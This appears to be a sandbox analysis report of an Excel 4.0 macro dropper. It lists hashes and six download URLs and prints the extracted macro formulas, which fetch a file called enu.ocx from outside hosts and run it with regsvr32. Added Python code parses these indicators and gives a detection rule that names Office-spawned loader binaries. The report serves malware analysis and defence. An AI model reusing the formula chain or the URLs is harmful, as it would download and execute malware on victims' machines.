General

  • Target

    2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

  • Size

    46KB

  • Sample

    241120-qzkejsxcjg

  • MD5

    bc00302b829243d357d9635c4564d4fd

  • SHA1

    b41fd9c7f89f49f0fae10115b4a708da38ad1682

  • SHA256

    2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

  • SHA512

    98e90f8f9fe683c50e5b87ef2082c8775038e1e90f0c11942cafc8a327abd068fdd5e388000816bf4ac4dfb1525d7fc8b1f7008c23eec42135b3a16d805b4c0a

  • SSDEEP

    768:lF0oGDOevZCwrvtq+9zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2j3l:j0oGDttT5fTR4Lh1NisFYBc3cr+UqVU+

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/

http://demo.techopesolutions.com/strepsipteron/r9Eq68FJ/

http://bioinvsync.com/Boster/GgfcVHKCNEWlq/

http://shamsalnubalaa.com/wp-content/NPX/

http://www.al-khora-contracting.com/hyphenization/ZvfA5SvD/

http://alataa-aljadeed.com/wp-content/J5NwCPmjSppx/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/","..\enu.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://demo.techopesolutions.com/strepsipteron/r9Eq68FJ/","..\enu.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bioinvsync.com/Boster/GgfcVHKCNEWlq/","..\enu.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shamsalnubalaa.com/wp-content/NPX/","..\enu.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.al-khora-contracting.com/hyphenization/ZvfA5SvD/","..\enu.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alataa-aljadeed.com/wp-content/J5NwCPmjSppx/","..\enu.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
    =RETURN()
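The formula chain above is a failover list rather than six independent downloads: each IF() tests the cell holding the previous URLDownloadToFileA result, a failed call returns an HRESULT whose severity bit makes it negative as a signed 32-bit value, so the next URL is tried only when the previous one failed, every attempt writes the same ..\enu.ocx, the workbook closes if all six fail, and otherwise regsvr32 /s loads the dropped file. The Python below is an added example, not part of the sandbox report or of any tool it names: it parses the formulas into IOCs without evaluating them and emulates the guard logic. The cell layout (first CALL in D10, each guard reading the cell two rows above) is inferred from the guards, and the HRESULT values fed to the simulation are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed input: the nine formulas the report extracted, one per line
# (the report flattens them onto a single line). Raw string so the backslashes
# in the Windows paths survive untouched.
FORMULAS = r"""
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/","..\enu.ocx",0,0)
=IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://demo.techopesolutions.com/strepsipteron/r9Eq68FJ/","..\enu.ocx",0,0))
=IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bioinvsync.com/Boster/GgfcVHKCNEWlq/","..\enu.ocx",0,0))
=IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shamsalnubalaa.com/wp-content/NPX/","..\enu.ocx",0,0))
=IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.al-khora-contracting.com/hyphenization/ZvfA5SvD/","..\enu.ocx",0,0))
=IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alataa-aljadeed.com/wp-content/J5NwCPmjSppx/","..\enu.ocx",0,0))
=IF('EFALGV'!D20<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
=RETURN()
"""

# CALL("urlmon","URLDownloadToFileA",<arg types>,0,<url>,<local file>,0,0)
CALL_RE = re.compile(
    r'CALL\("urlmon","URLDownloadToFileA","[A-Z]+",0,"(?P<url>[^"]+)","(?P<path>[^"]+)",0,0\)'
)
# IF('<sheet>'!<cell><0, ...): the guard that chains each attempt to the previous result
GUARD_RE = re.compile(r"IF\('[^']+'!(?P<cell>[A-Z]+[0-9]+)<0,")
EXEC_RE = re.compile(r'EXEC\("(?P<cmd>[^"]+)"\)')


@dataclass
class DropperConfig:
    urls: List[str] = field(default_factory=list)          # in failover order
    drop_path: Optional[str] = None                        # every URL is written to the same file
    guard_cells: List[str] = field(default_factory=list)   # cells whose HRESULT each IF() tests
    closes_on_failure: bool = False                        # CLOSE(0) when the last attempt also failed
    exec_cmd: Optional[str] = None


def parse_xlm_dropper(formulas: str) -> DropperConfig:
    """Pull the IOCs out of the formula chain without evaluating any of it."""
    cfg = DropperConfig()
    for line in formulas.strip().splitlines():
        m = CALL_RE.search(line)
        if m:
            cfg.urls.append(m.group("url"))
            cfg.drop_path = m.group("path")
        g = GUARD_RE.search(line)
        if g:
            cfg.guard_cells.append(g.group("cell"))
        if "CLOSE(0)" in line:
            cfg.closes_on_failure = True
        e = EXEC_RE.search(line)
        if e:
            cfg.exec_cmd = e.group("cmd")
    return cfg


def hresult_is_failure(hr: int) -> bool:
    """URLDownloadToFileA returns an HRESULT; Excel holds it in the cell as a
    signed 32-bit number, so '<0' is true exactly when the severity bit is set."""
    return bool(hr & 0x80000000)


def simulate_chain(cfg: DropperConfig, hresults: Dict[str, int]) -> Tuple[Optional[str], bool]:
    """Walk the failover logic. `hresults` maps URL -> HRESULT the download
    would return (constructed; unlisted URLs count as unreachable,
    INET_E_RESOURCE_NOT_FOUND = 0x800C0005). Returns (URL that succeeded or
    None, whether the EXEC line is reached)."""
    for url in cfg.urls:
        if not hresult_is_failure(hresults.get(url, 0x800C0005)):
            # A successful download leaves 0 in its cell; every later IF() then
            # yields FALSE, and neither 0 nor FALSE is < 0 in Excel, so the
            # remaining guards fall through to the EXEC line.
            return url, cfg.exec_cmd is not None
    # All attempts failed: the last guard sees a negative HRESULT and runs CLOSE(0).
    return None, (not cfg.closes_on_failure) and cfg.exec_cmd is not None


if __name__ == "__main__":
    cfg = parse_xlm_dropper(FORMULAS)
    for i, url in enumerate(cfg.urls, 1):
        print(f"C2 #{i}: {url}")
    print("drop path:", cfg.drop_path)
    print("exec:", cfg.exec_cmd)
    # Only the third host answers: the chain stops there and still reaches EXEC.
    print(simulate_chain(cfg, {cfg.urls[2]: 0}))
```

The parser deliberately does not interpret the sheet; it only needs the three shapes (CALL, IF guard, EXEC) that this dropper family uses, so the same code works on any variant that swaps hosts or the drop filename. For blocking, the useful outputs are the six hosts, the fixed drop name enu.ocx, and the regsvr32 /s invocation from a relative path.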

Extracted

  • Language

    xlm4.0

  • Source

    xlm40.dropper

  • URLs

    http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/

Targets

    • Target

      2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

    • Size

      46KB

    • MD5

      bc00302b829243d357d9635c4564d4fd

    • SHA1

      b41fd9c7f89f49f0fae10115b4a708da38ad1682

    • SHA256

      2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

    • SHA512

      98e90f8f9fe683c50e5b87ef2082c8775038e1e90f0c11942cafc8a327abd068fdd5e388000816bf4ac4dfb1525d7fc8b1f7008c23eec42135b3a16d805b4c0a

    • SSDEEP

      768:lF0oGDOevZCwrvtq+9zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2j3l:j0oGDttT5fTR4Lh1NisFYBc3cr+UqVU+

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
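The child process behind this signature is the EXEC line of the macro: Excel starting C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx. The Python below is an added example, not part of the sandbox report, showing the detection a SOC would run over process-creation telemetry for this behaviour. The events are constructed in the shape of Sysmon Event ID 1 reduced to three fields, the Office install paths and the parent/child name lists are assumptions, and the extra tags for regsvr32 record the traits of this sample's command line (silent registration, relative path, .ocx extension).

```python
from dataclasses import dataclass
from typing import List, Optional

# Constructed events shaped like Sysmon Event ID 1 (process creation), reduced
# to the three fields the rule needs. The first is what this sample's EXEC
# line would produce; the others are benign controls and a second Office case.


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


SAMPLE_EVENTS: List[ProcessEvent] = [
    ProcessEvent(r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\SysWow64\regsvr32.exe",
                 r"C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
                 r'"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" invoice.xls'),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Program Files\Vendor\comctl.ocx"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -w hidden -c Get-Date"),
]

# Assumed lists: Office hosts that should never spawn these, and the script/
# loader binaries macro droppers reach for.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBIN_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                   "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}


def basename(path: str) -> str:
    """Case-insensitive file name of an image path, tolerant of either slash."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def detect(ev: ProcessEvent) -> Optional[str]:
    """Return a tag string when an Office application spawns a script/loader
    binary, else None. The parent/child pair alone is the alert condition;
    regsvr32 arguments only add context so an analyst sees why it matters."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent not in OFFICE_PARENTS or child not in LOLBIN_CHILDREN:
        return None
    tags = [f"{parent}->{child}"]
    args = ev.command_line.lower().split()[1:]
    if child == "regsvr32.exe":
        if "/s" in args:
            tags.append("silent")
        if any(a.startswith("..\\") for a in args):
            tags.append("relative-path")
        if any(a.endswith(".ocx") for a in args):
            tags.append("ocx")
    return " ".join(tags)


def scan(events: List[ProcessEvent]) -> List[Optional[str]]:
    return [detect(ev) for ev in events]


if __name__ == "__main__":
    for ev, hit in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(hit or "-", "|", basename(ev.parent_image), "->", ev.command_line)
```

Keying the alert on the parent/child pair rather than on regsvr32 /s keeps installer-driven registrations (the msiexec event) quiet while still catching the same macro if a later variant swaps regsvr32 for rundll32 or mshta.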

MITRE ATT&CK Enterprise v15

Tasks